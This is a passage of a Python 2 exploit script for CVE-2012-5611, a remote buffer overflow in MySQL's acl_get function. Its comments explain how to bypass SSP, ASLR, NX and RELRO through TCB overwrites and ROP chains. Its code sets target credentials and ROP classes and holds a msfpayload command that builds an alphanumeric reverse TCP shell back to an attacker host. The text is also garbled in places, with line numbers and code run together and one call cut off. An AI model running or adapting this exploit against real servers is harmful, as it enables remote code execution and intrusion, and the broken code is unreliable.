1 !/usr/bin/env python2 #27/12/12 - status : public release
3
4 #CVE-2012-5611 ( https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5611 )
5 #-------- Author : ipv
6 #-------- Impact : high
7 #-------- URL : http://blog.ring0.me/
8 #-------- Description
9 #10 #The code below is linked to CVE-2012-5611, a flaw discovered by kingcope.
11 #MySQL server is prone to a remote buffer overflow that
12 #allow remote authenticated attacker to reach code execution in the
13 #context of the user running MySQL instance (default: mysql user).
14
15 #The vulnerability resides in acl_get function, called when authenticated
16 #user requests a privileged Account Managment statement. MySQL fails
17 #to verify user controlled data len of "db" parameter.
18 #19 #end=strmov((tmp_db=strmov(strmov(key, ip ? ip : "")+1,user)+1),db);
20 #21 #The destination address of strcpy is located on a mmaped page dedicated to
22 #user connection which allow a buffer overflow on adjacent memory.
23 #24 #Differents attacks vector may be possiblea according the system.
25 #FYI Microsoft Windows versions are as well vulnerables.
26 #---------------------------------------------------------
27 #To bypass ASLR/SSP/RELRO/NX:
28 #------------------------------------------------------------------------------
29 #I take profit of Threading-Model. This means MySQL use only one address
30 #space for all MySQL ressources (data structures, network managment,
31 #session, etc.).
32 #To bypass SSP, i overwrite sysinfo handler(pointing to sysenter vdso) of
33 #TCB structure located more higher on the stack.
34 #ROP chains aims to pivot to our controlled stack data. At this point,
35 #if we overwrite sysinfo handler, we cannot use ret2libc and/or GOT
36 #deferencing technique since libc API relies on the sysinfo pointer
37 #to call sysenter.
38 #39 #So to accomplish code exec, afaik, you have two way :
40 #1 - Extract sysinfo of an intact TCB and use it as proxy call
41 #(or you can restore the first sysinfo after doing modification on got)
42 #-> i use it for redhat exploit (no SSP on redhat/centos);
43 #-> this allow us to bypass relro/alsr/nx
44 #relro.
45 #2 - Find a int0x80 / sysenter gadget in .text ;
46 #(Bad instruction follow int0x80 gadget, you have a one shooter to get
47 #code exec). So, i advise you to find a sysenter)
48 #- i use sysenter for ubuntu 10.04 self-compiled with SSP.
49 #- this allow us bypass relro/ssp/alsr/nx
50 #
51 #Shellcodes are alphanum-mixed (skylined tool ftw). Exploit bypass
52 #SSP/ASLR/NX.
53 #54 #---------------------------------------------------------
55 #UTF-8 and ROP chains limitation :
56 #---------------------------------------------------------
57 #Mysql Schema Object Name restricts database name to be alpha numeric
58 #(and $ _).
59 #To bypass it, i use utf-8 encoding with byte lower than 0x80. Encoding is
60 #done via MySQL when databasename is quoted with `` (mandatory to
61 #successful exploit target). Yes the devil is in the details.
62
63 #MySQL reference : https://dev.mysql.com/doc/refman/5.1/en/identifiers.html
64 #65 #For any comments/job offer, mail me : ipv _at_ consortium-of-pwners . net
66
67 ########################################################################
68 #Modules
69 #70
71 importpymysql72 importsys73 importstruct74 importos, socket75
76 ########################################################################
77 #Authentication options
78 #79
80 MYSQL_USER = "test"
81 MYSQL_PASSWORD = ""
82
83 #MYSQL_HOST = "192.168.130.147"
84 MYSQL_HOST = "192.168.130.129"
85 MYSQL_PORT = 3306
86
87 ########################################################################
88 #Helper
89 #
90
91 def_x(v):92 ifisinstance(v, str):93 returnv94 return struct.pack("
96 #TCP is used when we face to SSP
97 class_TCB:98 tcb = 0 #updated later by a ret gadget
99 dtv = "BBBB"
100 _self = "CCCC"
101 multiple_threads= "DDDD"
102 sysinfo = 0 #SEIP - updated later by stack pivot gadget
103 stack_guard = "AAAA"
104 pointer_guard = 0 #updated later by a pop pop ret gadget
105
106 #base class
107 classrc_base:108 eip_off =0109 align_payload =0110 align_stack = 2048
111 retsled = ""
112 safe_overwrite = ""
113 pivot = ""
114 pppr = ""
115 ppr = ""
116
117 #./msf/msfpayload linux/x86/shell_reverse_tcp2 LHOST=192.168.130.1 LPORT=4444 R | ./alpha2 esp
118 #XXX - CHANGEME !
119 sc_rev_tcp =